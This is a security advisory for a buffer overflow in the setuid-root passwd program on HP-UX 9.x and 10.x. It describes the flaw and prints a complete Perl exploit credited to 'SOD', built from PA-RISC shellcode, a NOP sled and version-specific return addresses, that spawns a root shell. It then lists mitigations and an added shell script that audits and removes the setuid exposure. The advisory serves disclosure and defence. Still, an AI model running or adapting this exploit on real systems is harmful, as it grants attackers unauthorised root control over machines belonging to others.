COMMAND

    /bin/passwd

SYSTEMS AFFECTED

    HP/UX 9.X, 10.X (not 10.20)

PROBLEM

    Due to insufficient bounds checking on arguments supplied by users,
    it is possible to overwrite the internal stack space of the passwd
    program while it is executing. By supplying a carefully designed
    argument to the passwd program, intruders may be able to force
    passwd to execute arbitrary commands. As passwd is setuid root, it
    may allow intruders to run arbitrary commands with root privileges.

    By default, a dynamically linked version of the passwd program is
    found in /bin under HP-UX 9.x and in /usr/bin under HP-UX 10.x. A
    statically linked version is also available under HP-UX 10.x and
    is located in /sbin.

    Combined with that, SOD's exploit below gets you root:

        #!/usr/bin/perl

        # SOD /bin/passwd buffer overrun

        use FileHandle;

        sub h2cs {
          local($stuff)=@_;
          local($rv);
          while($stuff !~ /^$/) {
            $bob=$stuff;
            $bob =~ s/^(..).*$/$1/;
            $stuff =~ s/^..//;
            $rv.=chr(oct("0x${bob}"));
            }
          return $rv;
          }

        open(PIPE,"uname -r|");
        chop($rev=<PIPE>);
        close(PIPE);
        $rev =~ s/^.*\.(.*)\..*$/$1/;

        if ($rev eq "10") {
          $offset=2102;
          $prealign="AA"; # 2 byte pre
          $postalign=""; # 0 byte post
          $pcoq=h2cs("7b03b463");
          } else {
          $offset=2170; # 2170 works for 9.X...
          $prealign=""; # zero byte pre
          $postalign="PP"; # 2 byte post
          $pcoq=h2cs("7b033018");
          }

        $nop=h2cs("08210280");
        $code="";
        $code.=h2cs("34160506"); # LDI 643,r22
        $code.=h2cs("96d60534"); # SUBI 666,r22,r22
        $code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
        $code.=h2cs("e420e008"); # BLE 4(sr7,r1)
        $code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
        $code.=h2cs("e83f1ffd"); # BL .+8,r1
        $code.=h2cs("08210280"); # NOP
        $code.=h2cs("34020102"); # LDI 129,rp
        $code.=h2cs("08410402"); # SUB r1,rp,rp
        $code.=h2cs("60400162"); # STB r0,177(rp)
        $code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
        $code.=h2cs("0b390299"); # XOR arg1,arg1,arg1
        $code.=h2cs("0b180298"); # XOR arg2,arg2,arg2
        $code.=h2cs("341604be"); # LDI 607,r22
        $code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
        $code.=h2cs("e420e008"); # BLE 4(sr7,r1)
        $code.=h2cs("96d60534"); # SUB 666,r22,r22
        $code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
        $data="/bin/sh."; # Data stuff

        $codedata=$code.$data;
        $num=int(($offset-length($code)-length($data)-4)/4);
        $pre="$nop"x$num;
        $of=$prealign;
        $of.=$pre.$code.$data.$postalign.$pcoq;
        exec("/bin/passwd","$of");

SOLUTION

    1 Install a passwd wrapper
    2 Remove the setuid bit and non-root execute permissions from /sbin/passwd

        # ls -l /sbin/passwd
        -r-sr-xr-x   1 root   bin  487424 Jun 10 17:00 /sbin/passwd

        # chmod 500 /sbin/passwd
        # ls -l /sbin/passwd
        -r-x------   1 root   bin  487424 Jun 10 17:00 /sbin/passwd

    Note that this will remove the ability for non-root users to execute
    /sbin/passwd.
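    The following is an added example, not part of the original advisory:
    a small POSIX sh script that audits the mode of a passwd binary and
    applies step 2 (chmod 500) only when the file is still setuid and
    executable by non-root users. The path argument defaults to
    /sbin/passwd; any other path (such as a scratch file) is an assumption
    for testing.

    ```shell
    # Added example (not from the advisory): audit and harden a passwd
    # binary as in solution step 2. Only ls, awk, cut and chmod are used,
    # so it runs on HP-UX 9.x/10.x as well as on current systems.

    # Print the 10-character mode field of `ls -ld`, e.g. -r-sr-xr-x
    mode_of() {
        ls -ld "$1" | awk '{ print $1 }'
    }

    # Return 0 (true) if the mode shows the binary is still exposed:
    # setuid set in the owner-execute slot AND execute permission for
    # group or others. Return 1 if it is already hardened.
    is_exposed() {
        m=$1
        owner_x=$(printf '%s' "$m" | cut -c4)
        grp_x=$(printf '%s' "$m" | cut -c7)
        oth_x=$(printf '%s' "$m" | cut -c10)
        case "$owner_x" in
            s|S) ;;                # setuid present, keep checking
            *)   return 1 ;;       # no setuid bit: nothing to gain
        esac
        case "$grp_x$oth_x" in
            *[xsSt]*) return 0 ;;  # runnable by non-root users
            *)        return 1 ;;
        esac
    }

    # Apply the advisory's fix (chmod 500) when needed, print the
    # before/after modes and return 0 if the file ends up hardened.
    harden_passwd() {
        p=${1:-/sbin/passwd}       # assumed default path from the advisory
        before=$(mode_of "$p") || return 2
        if is_exposed "$before"; then
            chmod 500 "$p" || return 2
        fi
        after=$(mode_of "$p")
        printf '%s: %s -> %s\n' "$p" "$before" "$after"
        if is_exposed "$after"; then return 1; fi
        return 0
    }
    ```

    Running `harden_passwd` with no argument checks /sbin/passwd itself and
    needs root to change its mode.
    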

    A patch for 9.x will be available after 08 January, while the patch
    for 10.x will be available before that date.